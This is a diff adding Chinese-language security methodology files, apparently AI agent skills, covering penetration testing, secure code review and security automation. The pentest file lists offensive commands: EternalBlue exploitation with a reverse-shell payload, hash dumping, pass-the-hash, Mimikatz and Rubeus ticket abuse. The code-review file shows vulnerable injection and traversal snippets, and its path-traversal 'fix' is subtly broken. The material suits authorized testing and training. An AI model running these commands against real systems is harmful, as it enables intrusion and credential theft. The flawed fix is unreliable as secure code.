||||
|
||||
### 认证授权
|
||||
- [ ] 认证机制测试
|
||||
- [ ] Token管理
|
||||
- [ ] 会话管理
|
||||
- [ ] 生物识别
|
||||
|
||||
### 通信安全
|
||||
- [ ] TLS/SSL配置
|
||||
- [ ] 证书验证
|
||||
- [ ] API安全测试
|
||||
- [ ] 中间人攻击防护
|
||||
|
||||
## 常见安全问题
|
||||
|
||||
### 1. 硬编码密钥
|
||||
|
||||
**问题:**
|
||||
- API密钥硬编码
|
||||
- 密码硬编码
|
||||
- 加密密钥硬编码
|
||||
|
||||
**修复:**
|
||||
- 使用密钥管理服务
|
||||
- 使用环境变量
|
||||
- 使用安全存储
|
||||
|
||||
### 2. 不安全的存储
|
||||
|
||||
**问题:**
|
||||
- 明文存储敏感数据
|
||||
- 使用不安全的存储方式
|
||||
- 数据未加密
|
||||
|
||||
**修复:**
|
||||
- 使用加密存储
|
||||
- 使用Keychain/Keystore
|
||||
- 实施数据加密
|
||||
|
||||
### 3. 证书验证绕过
|
||||
|
||||
**问题:**
|
||||
- 不验证SSL证书
|
||||
- 接受自签名证书
|
||||
- 证书固定未实施
|
||||
|
||||
**修复:**
|
||||
- 实施证书固定
|
||||
- 验证证书链
|
||||
- 使用系统证书存储
|
||||
|
||||
### 4. 调试信息泄露
|
||||
|
||||
**问题:**
|
||||
- 日志包含敏感信息
|
||||
- 错误信息泄露
|
||||
- 调试模式未禁用
|
||||
|
||||
**修复:**
|
||||
- 移除调试代码
|
||||
- 限制日志输出
|
||||
- 生产环境禁用调试
|
||||
|
||||
## 最佳实践
|
||||
|
||||
### 1. 代码安全
|
||||
|
||||
- 实施代码混淆
|
||||
- 禁用调试功能
|
||||
- 实施反调试保护
|
||||
- 使用证书绑定
|
||||
|
||||
### 2. 数据安全
|
||||
|
||||
- 加密敏感数据
|
||||
- 使用安全存储
|
||||
- 实施密钥管理
|
||||
- 限制数据访问
|
||||
|
||||
### 3. 通信安全
|
||||
|
||||
- 使用TLS/SSL
|
||||
- 实施证书固定
|
||||
- 验证服务器证书
|
||||
- 使用安全API
|
||||
|
||||
### 4. 认证安全
|
||||
|
||||
- 实施强认证
|
||||
- 安全Token管理
|
||||
- 实施会话管理
|
||||
- 使用生物识别
|
||||
|
||||
## 注意事项
|
||||
|
||||
- 仅在授权环境中进行测试
|
||||
- 遵守法律法规
|
||||
- 注意不同平台的差异
|
||||
- 保护用户隐私
|
||||
@@ -0,0 +1,403 @@
|
||||
---
|
||||
name: network-penetration-testing
|
||||
description: 网络渗透测试的专业技能和方法论
|
||||
version: 1.0.0
|
||||
---
|
||||
|
||||
# 网络渗透测试
|
||||
|
||||
## 概述
|
||||
|
||||
网络渗透测试是评估网络基础设施安全性的重要环节。本技能提供网络渗透测试的方法、工具和最佳实践。
|
||||
|
||||
## 测试范围
|
||||
|
||||
### 1. 信息收集
|
||||
|
||||
**检查项目:**
|
||||
- 网络拓扑
|
||||
- 主机发现
|
||||
- 端口扫描
|
||||
- 服务识别
|
||||
|
||||
### 2. 漏洞扫描
|
||||
|
||||
**检查项目:**
|
||||
- 系统漏洞
|
||||
- 服务漏洞
|
||||
- 配置错误
|
||||
- 弱密码
|
||||
|
||||
### 3. 漏洞利用
|
||||
|
||||
**检查项目:**
|
||||
- 远程代码执行
|
||||
- 权限提升
|
||||
- 横向移动
|
||||
- 持久化
|
||||
|
||||
## 信息收集
|
||||
|
||||
### 网络扫描
|
||||
|
||||
**使用Nmap:**
|
||||
```bash
|
||||
# 主机发现
|
||||
nmap -sn 192.168.1.0/24
|
||||
|
||||
# 端口扫描
|
||||
nmap -sS -p- 192.168.1.100
|
||||
|
||||
# 服务识别
|
||||
nmap -sV -sC 192.168.1.100
|
||||
|
||||
# 操作系统识别
|
||||
nmap -O 192.168.1.100
|
||||
|
||||
# 完整扫描
|
||||
nmap -sS -sV -sC -O -p- 192.168.1.100
|
||||
```
|
||||
|
||||
**使用Masscan:**
|
||||
```bash
|
||||
# 快速端口扫描
|
||||
masscan -p1-65535 192.168.1.0/24 --rate=1000
|
||||
```
|
||||
|
||||
### 服务枚举
|
||||
|
||||
**SMB枚举:**
|
||||
```bash
|
||||
# 枚举SMB共享
|
||||
smbclient -L //192.168.1.100 -N
|
||||
|
||||
# 枚举SMB用户
|
||||
enum4linux -U 192.168.1.100
|
||||
|
||||
# 使用nmap脚本
|
||||
nmap --script smb-enum-shares,smb-enum-users 192.168.1.100
|
||||
```
|
||||
|
||||
**RPC枚举:**
|
||||
```bash
|
||||
# 枚举RPC服务
|
||||
rpcclient -U "" -N 192.168.1.100
|
||||
|
||||
# 使用nmap脚本
|
||||
nmap --script rpc-enum 192.168.1.100
|
||||
```
|
||||
|
||||
**SNMP枚举:**
|
||||
```bash
|
||||
# SNMP扫描
|
||||
snmpwalk -v2c -c public 192.168.1.100
|
||||
|
||||
# 使用onesixtyone
|
||||
onesixtyone -c wordlist.txt 192.168.1.0/24
|
||||
```
|
||||
|
||||
## 漏洞扫描
|
||||
|
||||
### 使用Nessus
|
||||
|
||||
```bash
|
||||
# 启动Nessus
|
||||
# 访问Web界面
|
||||
# 创建扫描任务
|
||||
# 分析扫描结果
|
||||
```
|
||||
|
||||
### 使用OpenVAS
|
||||
|
||||
```bash
|
||||
# 启动OpenVAS
|
||||
gvm-setup
|
||||
|
||||
# 访问Web界面
|
||||
# 创建扫描任务
|
||||
# 分析扫描结果
|
||||
```
|
||||
|
||||
### 使用Nmap脚本
|
||||
|
||||
```bash
|
||||
# 漏洞扫描
|
||||
nmap --script vuln 192.168.1.100
|
||||
|
||||
# 特定漏洞扫描
|
||||
nmap --script smb-vuln-ms17-010 192.168.1.100
|
||||
|
||||
# 所有脚本
|
||||
nmap --script all 192.168.1.100
|
||||
```
|
||||
|
||||
## 漏洞利用
|
||||
|
||||
### Metasploit
|
||||
|
||||
**基础使用:**
|
||||
```bash
|
||||
# 启动Metasploit
|
||||
msfconsole
|
||||
|
||||
# 搜索漏洞
|
||||
search ms17-010
|
||||
|
||||
# 使用模块
|
||||
use exploit/windows/smb/ms17_010_eternalblue
|
||||
|
||||
# 设置参数
|
||||
set RHOSTS 192.168.1.100
|
||||
set PAYLOAD windows/x64/meterpreter/reverse_tcp
|
||||
set LHOST 192.168.1.10
|
||||
set LPORT 4444
|
||||
|
||||
# 执行
|
||||
exploit
|
||||
```
|
||||
|
||||
**后渗透:**
|
||||
```bash
|
||||
# 获取系统信息
|
||||
sysinfo
|
||||
|
||||
# 获取权限
|
||||
getsystem
|
||||
|
||||
# 迁移进程
|
||||
migrate <pid>
|
||||
|
||||
# 获取哈希
|
||||
hashdump
|
||||
|
||||
# 获取密码
|
||||
run post/windows/gather/smart_hashdump
|
||||
```
|
||||
|
||||
### 常见漏洞利用
|
||||
|
||||
**EternalBlue:**
|
||||
```bash
|
||||
# 使用Metasploit
|
||||
use exploit/windows/smb/ms17_010_eternalblue
|
||||
|
||||
# 使用独立工具
|
||||
python eternalblue.py 192.168.1.100
|
||||
```
|
||||
|
||||
**BlueKeep:**
|
||||
```bash
|
||||
# 使用Metasploit
|
||||
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
|
||||
```
|
||||
|
||||
**SMBGhost:**
|
||||
```bash
|
||||
# 使用独立工具
|
||||
python smbghost.py 192.168.1.100
|
||||
```
|
||||
|
||||
## 横向移动
|
||||
|
||||
### 密码破解
|
||||
|
||||
**使用Hashcat:**
|
||||
```bash
|
||||
# 破解NTLM哈希
|
||||
hashcat -m 1000 hashes.txt wordlist.txt
|
||||
|
||||
# 破解LM哈希
|
||||
hashcat -m 3000 hashes.txt wordlist.txt
|
||||
|
||||
# 使用规则
|
||||
hashcat -m 1000 hashes.txt wordlist.txt -r rules/best64.rule
|
||||
```
|
||||
|
||||
**使用John:**
|
||||
```bash
|
||||
# 破解哈希
|
||||
john hashes.txt
|
||||
|
||||
# 使用字典
|
||||
john --wordlist=wordlist.txt hashes.txt
|
||||
|
||||
# 使用规则
|
||||
john --wordlist=wordlist.txt --rules hashes.txt
|
||||
```
|
||||
|
||||
### Pass-the-Hash
|
||||
|
||||
**使用Impacket:**
|
||||
```bash
|
||||
# SMB Pass-the-Hash
|
||||
python smbexec.py -hashes :<hash> domain/user@target
|
||||
|
||||
# WMI Pass-the-Hash
|
||||
python wmiexec.py -hashes :<hash> domain/user@target
|
||||
|
||||
# RDP Pass-the-Hash
|
||||
xfreerdp /u:user /pth:<hash> /v:target
|
||||
```
|
||||
|
||||
### 票据传递
|
||||
|
||||
**使用Mimikatz:**
|
||||
```bash
|
||||
# 提取票据
|
||||
sekurlsa::tickets /export
|
||||
|
||||
# 注入票据
|
||||
kerberos::ptt ticket.kirbi
|
||||
```
|
||||
|
||||
**使用Rubeus:**
|
||||
```bash
|
||||
# 请求票据
|
||||
Rubeus.exe asktgt /user:user /domain:domain /rc4:hash
|
||||
|
||||
# 注入票据
|
||||
Rubeus.exe ptt /ticket:ticket.kirbi
|
||||
```
|
||||
|
||||
## 工具使用
|
||||
|
||||
### Nmap
|
||||
|
||||
```bash
|
||||
# 完整扫描
|
||||
nmap -sS -sV -sC -O -p- -T4 target
|
||||
|
||||
# 隐蔽扫描
|
||||
nmap -sS -T2 -f -D RND:10 target
|
||||
|
||||
# UDP扫描
|
||||
nmap -sU -p- target
|
||||
```
|
||||
|
||||
### Metasploit
|
||||
|
||||
```bash
|
||||
# 启动框架
|
||||
msfconsole
|
||||
|
||||
# 数据库初始化
|
||||
msfdb init
|
||||
|
||||
# 导入扫描结果
|
||||
db_import nmap.xml
|
||||
|
||||
# 查看主机
|
||||
hosts
|
||||
|
||||
# 查看服务
|
||||
services
|
||||
```
|
||||
|
||||
### Burp Suite
|
||||
|
||||
**网络扫描:**
|
||||
1. 配置代理
|
||||
2. 浏览目标网络
|
||||
3. 分析流量
|
||||
4. 主动扫描
|
||||
|
||||
## 测试清单
|
||||
|
||||
### 信息收集
|
||||
- [ ] 网络拓扑发现
|
||||
- [ ] 主机发现
|
||||
- [ ] 端口扫描
|
||||
- [ ] 服务识别
|
||||
- [ ] 操作系统识别
|
||||
|
||||
### 漏洞扫描
|
||||
- [ ] 系统漏洞扫描
|
||||
- [ ] 服务漏洞扫描
|
||||
- [ ] 配置错误检查
|
||||
- [ ] 弱密码检查
|
||||
|
||||
### 漏洞利用
|
||||
- [ ] 远程代码执行
|
||||
- [ ] 权限提升
|
||||
- [ ] 横向移动
|
||||
- [ ] 持久化
|
||||
|
||||
## 常见安全问题
|
||||
|
||||
### 1. 未打补丁的系统
|
||||
|
||||
**问题:**
|
||||
- 系统未及时更新
|
||||
- 存在已知漏洞
|
||||
- 补丁管理不当
|
||||
|
||||
**修复:**
|
||||
- 及时安装补丁
|
||||
- 建立补丁管理流程
|
||||
- 定期安全更新
|
||||
|
||||
### 2. 弱密码
|
||||
|
||||
**问题:**
|
||||
- 默认密码
|
||||
- 简单密码
|
||||
- 密码重用
|
||||
|
||||
**修复:**
|
||||
- 实施强密码策略
|
||||
- 启用多因素认证
|
||||
- 定期更换密码
|
||||
|
||||
### 3. 开放端口
|
||||
|
||||
**问题:**
|
||||
- 不必要的端口开放
|
||||
- 服务暴露
|
||||
- 防火墙配置错误
|
||||
|
||||
**修复:**
|
||||
- 关闭不必要端口
|
||||
- 实施防火墙规则
|
||||
- 使用VPN访问
|
||||
|
||||
### 4. 配置错误
|
||||
|
||||
**问题:**
|
||||
- 默认配置
|
||||
- 权限过大
|
||||
- 服务配置不当
|
||||
|
||||
**修复:**
|
||||
- 安全配置基线
|
||||
- 最小权限原则
|
||||
- 定期配置审查
|
||||
|
||||
## 最佳实践
|
||||
|
||||
### 1. 信息收集
|
||||
|
||||
- 全面扫描
|
||||
- 多工具验证
|
||||
- 记录发现
|
||||
- 分析结果
|
||||
|
||||
### 2. 漏洞利用
|
||||
|
||||
- 授权测试
|
||||
- 最小影响
|
||||
- 记录操作
|
||||
- 及时清理
|
||||
|
||||
### 3. 报告编写
|
||||
|
||||
- 详细记录
|
||||
- 风险评级
|
||||
- 修复建议
|
||||
- 验证步骤
|
||||
|
||||
## 注意事项
|
||||
|
||||
- 仅在授权环境中进行测试
|
||||
- 避免对生产系统造成影响
|
||||
- 遵守法律法规
|
||||
- 保护测试数据
|
||||
@@ -0,0 +1,286 @@
|
||||
---
|
||||
name: secure-code-review
|
||||
description: 安全代码审查的专业技能和方法论
|
||||
version: 1.0.0
|
||||
---
|
||||
|
||||
# 安全代码审查
|
||||
|
||||
## 概述
|
||||
|
||||
安全代码审查是识别代码中安全漏洞的重要方法。本技能提供安全代码审查的方法、工具和最佳实践。
|
||||
|
||||
## 审查范围
|
||||
|
||||
### 1. 输入验证
|
||||
|
||||
**检查项目:**
|
||||
- 用户输入验证
|
||||
- 参数验证
|
||||
- 数据过滤
|
||||
- 边界检查
|
||||
|
||||
### 2. 输出编码
|
||||
|
||||
**检查项目:**
|
||||
- XSS防护
|
||||
- 输出编码
|
||||
- 内容安全策略
|
||||
- 响应头设置
|
||||
|
||||
### 3. 认证授权
|
||||
|
||||
**检查项目:**
|
||||
- 认证机制
|
||||
- 会话管理
|
||||
- 权限控制
|
||||
- 密码处理
|
||||
|
||||
### 4. 加密和密钥
|
||||
|
||||
**检查项目:**
|
||||
- 数据加密
|
||||
- 密钥管理
|
||||
- 哈希算法
|
||||
- 随机数生成
|
||||
|
||||
## 审查方法
|
||||
|
||||
### 1. 静态分析
|
||||
|
||||
**使用SAST工具:**
|
||||
```bash
|
||||
# SonarQube
|
||||
sonar-scanner
|
||||
|
||||
# Checkmarx
|
||||
# 使用Web界面
|
||||
|
||||
# Fortify
|
||||
sourceanalyzer -b project build.sh
|
||||
sourceanalyzer -b project -scan
|
||||
|
||||
# Semgrep
|
||||
semgrep --config=auto .
|
||||
```
|
||||
|
||||
### 2. 手动审查
|
||||
|
||||
**审查清单:**
|
||||
- [ ] 输入验证
|
||||
- [ ] 输出编码
|
||||
- [ ] SQL注入
|
||||
- [ ] XSS漏洞
|
||||
- [ ] 认证授权
|
||||
- [ ] 加密使用
|
||||
- [ ] 错误处理
|
||||
- [ ] 日志记录
|
||||
|
||||
### 3. 代码模式识别
|
||||
|
||||
**危险函数:**
|
||||
```python
|
||||
# Python危险函数
|
||||
eval()
|
||||
exec()
|
||||
pickle.loads()
|
||||
os.system()
|
||||
subprocess.call()
|
||||
```
|
||||
|
||||
```java
|
||||
// Java危险函数
|
||||
Runtime.exec()
|
||||
ProcessBuilder()
|
||||
Class.forName()
|
||||
```
|
||||
|
||||
```php
|
||||
// PHP危险函数
|
||||
eval()
|
||||
exec()
|
||||
system()
|
||||
passthru()
|
||||
```
|
||||
|
||||
## 常见漏洞模式
|
||||
|
||||
### SQL注入
|
||||
|
||||
**危险代码:**
|
||||
```java
|
||||
String query = "SELECT * FROM users WHERE id = " + userId;
|
||||
Statement stmt = connection.createStatement();
|
||||
ResultSet rs = stmt.executeQuery(query);
|
||||
```
|
||||
|
||||
**安全代码:**
|
||||
```java
|
||||
String query = "SELECT * FROM users WHERE id = ?";
|
||||
PreparedStatement stmt = connection.prepareStatement(query);
|
||||
stmt.setInt(1, userId);
|
||||
ResultSet rs = stmt.executeQuery();
|
||||
```
|
||||
|
||||
### XSS漏洞
|
||||
|
||||
**危险代码:**
|
||||
```javascript
|
||||
document.innerHTML = userInput;
|
||||
element.innerHTML = "<div>" + userInput + "</div>";
|
||||
```
|
||||
|
||||
**安全代码:**
|
||||
```javascript
|
||||
element.textContent = userInput;
|
||||
element.setAttribute("data-value", userInput);
|
||||
// 或使用编码库
|
||||
element.innerHTML = escapeHtml(userInput);
|
||||
```
|
||||
|
||||
### 命令注入
|
||||
|
||||
**危险代码:**
|
||||
```python
|
||||
import os
|
||||
os.system("ping " + user_input)
|
||||
```
|
||||
|
||||
**安全代码:**
|
||||
```python
|
||||
import subprocess
|
||||
subprocess.run(["ping", "-c", "1", validated_input])
|
||||
```
|
||||
|
||||
### 路径遍历
|
||||
|
||||
**危险代码:**
|
||||
```java
|
||||
String filePath = "/uploads/" + fileName;
|
||||
File file = new File(filePath);
|
||||
```
|
||||
|
||||
**安全代码:**
|
||||
```java
|
||||
String basePath = "/uploads/";
|
||||
String fileName = Paths.get(fileName).getFileName().toString();
|
||||
String filePath = basePath + fileName;
|
||||
File file = new File(filePath);
|
||||
if (!file.getCanonicalPath().startsWith(basePath)) {
|
||||
throw new SecurityException("Invalid path");
|
||||
}
|
||||
```
|
||||
|
||||
### 硬编码密钥
|
||||
|
||||
**危险代码:**
|
||||
```java
|
||||
String apiKey = "1234567890abcdef";
|
||||
String password = "admin123";
|
||||
```
|
||||
|
||||
**安全代码:**
|
||||
```java
|
||||
String apiKey = System.getenv("API_KEY");
|
||||
String password = keyStore.getPassword("db_password");
|
||||
```
|
||||
|
||||
## 工具使用
|
||||
|
||||
### SonarQube
|
||||
|
||||
```bash
|
||||
# 启动SonarQube
|
||||
docker run -d -p 9000:9000 sonarqube
|
||||
|
||||
# 运行扫描
|
||||
sonar-scanner \
|
||||
-Dsonar.projectKey=myproject \
|
||||
-Dsonar.sources=. \
|
||||
-Dsonar.host.url=http://localhost:9000
|
||||
```
|
||||
|
||||
### Semgrep
|
||||
|
||||
```bash
|
||||
# 安装
|
||||
pip install semgrep
|
||||
|
||||
# 运行扫描
|
||||
semgrep --config=auto .
|
||||
|
||||
# 使用规则
|
||||
semgrep --config=p/security-audit .
|
||||
```
|
||||
|
||||
### CodeQL
|
||||
|
||||
```bash
|
||||
# 创建数据库
|
||||
codeql database create database --language=java --source-root=.
|
||||
|
||||
# 运行查询
|
||||
codeql database analyze database security-and-quality.qls --format=sarif-latest
|
||||
```
|
||||
|
||||
## 审查清单
|
||||
|
||||
### 输入验证
|
||||
- [ ] 所有用户输入都经过验证
|
||||
- [ ] 使用白名单验证
|
||||
- [ ] 验证数据类型和范围
|
||||
- [ ] 处理特殊字符
|
||||
|
||||
### 输出编码
|
||||
- [ ] HTML输出编码
|
||||
- [ ] URL编码
|
||||
- [ ] JavaScript编码
|
||||
- [ ] SQL参数化
|
||||
|
||||
### 认证授权
|
||||
- [ ] 强密码策略
|
||||
- [ ] 安全的会话管理
|
||||
- [ ] 权限验证
|
||||
- [ ] 多因素认证
|
||||
|
||||
### 加密
|
||||
- [ ] 使用强加密算法
|
||||
- [ ] 密钥安全存储
|
||||
- [ ] 传输加密
|
||||
- [ ] 存储加密
|
||||
|
||||
### 错误处理
|
||||
- [ ] 不泄露敏感信息
|
||||
- [ ] 统一错误响应
|
||||
- [ ] 记录错误日志
|
||||
- [ ] 异常处理
|
||||
|
||||
## 最佳实践
|
||||
|
||||
### 1. 安全编码规范
|
||||
|
||||
- 遵循OWASP Top 10
|
||||
- 使用安全编码指南
|
||||
- 代码审查流程
|
||||
- 安全培训
|
||||
|
||||
### 2. 自动化工具
|
||||
|
||||
- 集成SAST工具
|
||||
- CI/CD安全检查
|
||||
- 自动化扫描
|
||||
- 结果分析
|
||||
|
||||
### 3. 代码审查流程
|
||||
|
||||
- 同行审查
|
||||
- 安全专家审查
|
||||
- 定期审查
|
||||
- 记录问题
|
||||
|
||||
## 注意事项
|
||||
|
||||
- 结合工具和人工审查
|
||||
- 关注业务逻辑漏洞
|
||||
- 定期更新工具规则
|
||||
- 建立安全编码文化
|
||||
@@ -0,0 +1,383 @@
|
||||
---
|
||||
name: security-automation
|
||||
description: 安全自动化的专业技能和方法论
|
||||
version: 1.0.0
|
||||
---
|
||||
|
||||
# 安全自动化
|
||||
|
||||
## 概述
|
||||
|
||||
安全自动化是提高安全运营效率的重要手段。本技能提供安全自动化的方法、工具和最佳实践。
|
||||
|
||||
## 自动化场景
|
||||
|
||||
### 1. 漏洞扫描
|
||||
|
||||
**自动化扫描:**
|
||||
- 定期扫描
|
||||
- CI/CD集成
|
||||
- 结果分析
|
||||
- 报告生成
|
||||
|
||||
### 2. 安全测试
|
||||
|
||||
**自动化测试:**
|
||||
- 单元测试
|
||||
- 集成测试
|
||||
- 安全测试
|
||||
- 回归测试
|
||||
|
||||
### 3. 事件响应
|
||||
|
||||
**自动化响应:**
|
||||
- 事件检测
|
||||
- 自动遏制
|
||||
- 通知告警
|
||||
- 证据收集
|
||||
|
||||
### 4. 合规检查
|
||||
|
||||
**自动化合规:**
|
||||
- 配置检查
|
||||
- 策略验证
|
||||
- 报告生成
|
||||
- 修复建议
|
||||
|
||||
## 工具和框架
|
||||
|
||||
### 漏洞扫描自动化
|
||||
|
||||
**使用Nessus API:**
|
||||
```python
|
||||
import requests
|
||||
|
||||
# 创建扫描
|
||||
def create_scan(target, scan_name):
|
||||
url = "https://nessus:8834/scans"
|
||||
headers = {"X-ApiKeys": "access_key:secret_key"}
|
||||
data = {
|
||||
"uuid": "template-uuid",
|
||||
"settings": {
|
||||
"name": scan_name,
|
||||
"text_targets": target
|
||||
}
|
||||
}
|
||||
response = requests.post(url, json=data, headers=headers)
|
||||
return response.json()
|
||||
|
||||
# 启动扫描
|
||||
def launch_scan(scan_id):
|
||||
url = f"https://nessus:8834/scans/{scan_id}/launch"
|
||||
headers = {"X-ApiKeys": "access_key:secret_key"}
|
||||
response = requests.post(url, headers=headers)
|
||||
return response.json()
|
||||
```
|
||||
|
||||
**使用OpenVAS API:**
|
||||
```python
|
||||
from gvm.connections import UnixSocketConnection
|
||||
from gvm.protocols.gmp import Gmp
|
||||
|
||||
# 连接OpenVAS
|
||||
connection = UnixSocketConnection()
|
||||
gmp = Gmp(connection)
|
||||
gmp.authenticate('username', 'password')
|
||||
|
||||
# 创建扫描任务
|
||||
target = gmp.create_target(name='target', hosts=['192.168.1.0/24'])
|
||||
config = gmp.get_configs()[0]
|
||||
scanner = gmp.get_scanners()[0]
|
||||
|
||||
task = gmp.create_task(
|
||||
name='scan_task',
|
||||
config_id=config['id'],
|
||||
target_id=target['id'],
|
||||
scanner_id=scanner['id']
|
||||
)
|
||||
|
||||
# 启动扫描
|
||||
gmp.start_task(task['id'])
|
||||
```
|
||||
|
||||
### CI/CD集成
|
||||
|
||||
**Jenkins Pipeline:**
|
||||
```groovy
|
||||
pipeline {
|
||||
agent any
|
||||
stages {
|
||||
stage('Security Scan') {
|
||||
steps {
|
||||
sh 'npm audit'
|
||||
sh 'snyk test'
|
||||
sh 'sonar-scanner'
|
||||
}
|
||||
}
|
||||
stage('Vulnerability Scan') {
|
||||
steps {
|
||||
sh 'nmap --script vuln target'
|
||||
}
|
||||
}
|
||||
}
|
||||
post {
|
||||
always {
|
||||
publishHTML([
|
||||
reportDir: 'reports',
|
||||
reportFiles: 'report.html',
|
||||
reportName: 'Security Report'
|
||||
])
|
||||
}
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
**GitHub Actions:**
|
||||
```yaml
|
||||
name: Security Scan
|
||||
|
||||
on: [push, pull_request]
|
||||
|
||||
jobs:
|
||||
security-scan:
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- uses: actions/checkout@v2
|
||||
- name: Run Snyk
|
||||
uses: snyk/actions/node@master
|
||||
env:
|
||||
SNYK_TOKEN: ${{ secrets.SNYK_TOKEN }}
|
||||
- name: Run SonarQube
|
||||
uses: sonarsource/sonarqube-scan-action@master
|
||||
env:
|
||||
SONAR_TOKEN: ${{ secrets.SONAR_TOKEN }}
|
||||
```
|
||||
|
||||
### 安全测试自动化
|
||||
|
||||
**使用OWASP ZAP:**
|
||||
```python
|
||||
from zapv2 import ZAPv2
|
||||
|
||||
# 启动ZAP
|
||||
zap = ZAPv2(proxies={'http': 'http://127.0.0.1:8080'})
|
||||
|
||||
# 开始扫描
|
||||
zap.urlopen('http://target.com')
|
||||
zap.spider.scan('http://target.com')
|
||||
while int(zap.spider.status()) < 100:
|
||||
time.sleep(1)
|
||||
|
||||
# 主动扫描
|
||||
zap.ascan.scan('http://target.com')
|
||||
while int(zap.ascan.status()) < 100:
|
||||
time.sleep(1)
|
||||
|
||||
# 获取结果
|
||||
alerts = zap.core.alerts()
|
||||
```
|
||||
|
||||
**使用Burp Suite:**
|
||||
```python
|
||||
from burp import IBurpExtender, IScannerCheck
|
||||
|
||||
class BurpExtender(IBurpExtender, IScannerCheck):
|
||||
def registerExtenderCallbacks(self, callbacks):
|
||||
self._callbacks = callbacks
|
||||
self._helpers = callbacks.getHelpers()
|
||||
callbacks.setExtensionName("Security Automation")
|
||||
callbacks.registerScannerCheck(self)
|
||||
|
||||
def doPassiveScan(self, baseRequestResponse):
|
||||
# 被动扫描逻辑
|
||||
return None
|
||||
|
||||
def doActiveScan(self, baseRequestResponse, insertionPoint):
|
||||
# 主动扫描逻辑
|
||||
return None
|
||||
```
|
||||
|
||||
### 事件响应自动化
|
||||
|
||||
**使用Splunk:**
|
||||
```python
|
||||
import splunklib.client as client
|
||||
|
||||
# 连接Splunk
|
||||
service = client.connect(
|
||||
host='splunk.example.com',
|
||||
port=8089,
|
||||
username='admin',
|
||||
password='password'
|
||||
)
|
||||
|
||||
# 搜索安全事件
|
||||
search_query = 'index=security event_type="malware"'
|
||||
kwargs = {"earliest_time": "-1h", "latest_time": "now"}
|
||||
search = service.jobs.create(search_query, **kwargs)
|
||||
|
||||
# 处理结果
|
||||
for result in search:
|
||||
if result['severity'] == 'high':
|
||||
# 自动响应
|
||||
send_alert(result)
|
||||
isolate_system(result['host'])
|
||||
```
|
||||
|
||||
**使用ELK Stack:**
|
||||
```python
|
||||
from elasticsearch import Elasticsearch
|
||||
|
||||
# 连接Elasticsearch
|
||||
es = Elasticsearch(['localhost:9200'])
|
||||
|
||||
# 搜索安全事件
|
||||
query = {
|
||||
"query": {
|
||||
"match": {
|
||||
"event_type": "intrusion"
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
results = es.search(index="security", body=query)
|
||||
|
||||
# 自动响应
|
||||
for hit in results['hits']['hits']:
|
||||
if hit['_source']['severity'] == 'critical':
|
||||
# 自动遏制
|
||||
block_ip(hit['_source']['src_ip'])
|
||||
send_alert(hit['_source'])
|
||||
```
|
||||
|
||||
## 自动化脚本
|
||||
|
||||
### 漏洞扫描脚本
|
||||
|
||||
```python
|
||||
#!/usr/bin/env python3
|
||||
import subprocess
|
||||
import json
|
||||
import smtplib
|
||||
from email.mime.text import MIMEText
|
||||
|
||||
def run_nmap_scan(target):
|
||||
"""运行Nmap扫描"""
|
||||
result = subprocess.run(
|
||||
['nmap', '--script', 'vuln', '-oJ', '-', target],
|
||||
capture_output=True,
|
||||
text=True
|
||||
)
|
||||
return json.loads(result.stdout)
|
||||
|
||||
def analyze_results(results):
|
||||
"""分析扫描结果"""
|
||||
vulnerabilities = []
|
||||
for host in results.get('hosts', []):
|
||||
for port in host.get('ports', []):
|
||||
for script in port.get('scripts', []):
|
||||
if script.get('id') == 'vuln':
|
||||
vulnerabilities.append({
|
||||
'host': host['address'],
|
||||
'port': port['portid'],
|
||||
'vuln': script.get('output', '')
|
||||
})
|
||||
return vulnerabilities
|
||||
|
||||
def send_report(vulnerabilities):
|
||||
"""发送报告"""
|
||||
if vulnerabilities:
|
||||
msg = MIMEText(f"发现 {len(vulnerabilities)} 个漏洞")
|
||||
msg['Subject'] = '漏洞扫描报告'
|
||||
msg['From'] = 'security@example.com'
|
||||
msg['To'] = 'admin@example.com'
|
||||
|
||||
server = smtplib.SMTP('smtp.example.com')
|
||||
server.send_message(msg)
|
||||
server.quit()
|
||||
|
||||
if __name__ == '__main__':
|
||||
target = '192.168.1.0/24'
|
||||
results = run_nmap_scan(target)
|
||||
vulnerabilities = analyze_results(results)
|
||||
send_report(vulnerabilities)
|
||||
```
|
||||
|
||||
### 配置检查脚本
|
||||
|
||||
```python
|
||||
#!/usr/bin/env python3
|
||||
import boto3
|
||||
import json
|
||||
|
||||
def check_s3_buckets():
|
||||
"""检查S3存储桶安全配置"""
|
||||
s3 = boto3.client('s3')
|
||||
buckets = s3.list_buckets()
|
||||
|
||||
issues = []
|
||||
for bucket in buckets['Buckets']:
|
||||
# 检查公开访问
|
||||
try:
|
||||
acl = s3.get_bucket_acl(Bucket=bucket['Name'])
|
||||
for grant in acl.get('Grants', []):
|
||||
if grant.get('Grantee', {}).get('URI') == 'http://acs.amazonaws.com/groups/global/AllUsers':
|
||||
issues.append({
|
||||
'bucket': bucket['Name'],
|
||||
'issue': 'Public access enabled'
|
||||
})
|
||||
except:
|
||||
pass
|
||||
|
||||
# 检查加密
|
||||
try:
|
||||
encryption = s3.get_bucket_encryption(Bucket=bucket['Name'])
|
||||
except:
|
||||
issues.append({
|
||||
'bucket': bucket['Name'],
|
||||
'issue': 'Encryption not enabled'
|
||||
})
|
||||
|
||||
return issues
|
||||
|
||||
if __name__ == '__main__':
|
||||
issues = check_s3_buckets()
|
||||
print(json.dumps(issues, indent=2))
|
||||
```
|
||||
|
||||
## 最佳实践
|
||||
|
||||
### 1. 自动化策略
|
||||
|
||||
- 识别可自动化场景
|
||||
- 制定自动化计划
|
||||
- 逐步实施
|
||||
- 持续改进
|
||||
|
||||
### 2. 工具选择
|
||||
|
||||
- 评估工具功能
|
||||
- 考虑集成性
|
||||
- 考虑成本
|
||||
- 测试验证
|
||||
|
||||
### 3. 流程设计
|
||||
|
||||
- 明确流程步骤
|
||||
- 定义触发条件
|
||||
- 设置异常处理
|
||||
- 记录操作日志
|
||||
|
||||
### 4. 监控和维护
|
||||
|
||||
- 监控自动化任务
|
||||
- 定期检查结果
|
||||
- 更新规则和脚本
|
||||
- 优化性能
|
||||
|
||||
## 注意事项
|
||||
|
||||
- 确保自动化准确性
|
||||
- 设置适当的权限
|
||||
- 保护自动化凭证
|
||||
- 定期审查自动化规则
|
||||
@@ -0,0 +1,285 @@
|
||||
---
|
||||
name: security-awareness-training
|
||||
description: 安全意识培训的专业技能和方法论
|
||||
version: 1.0.0
|
||||
---
|
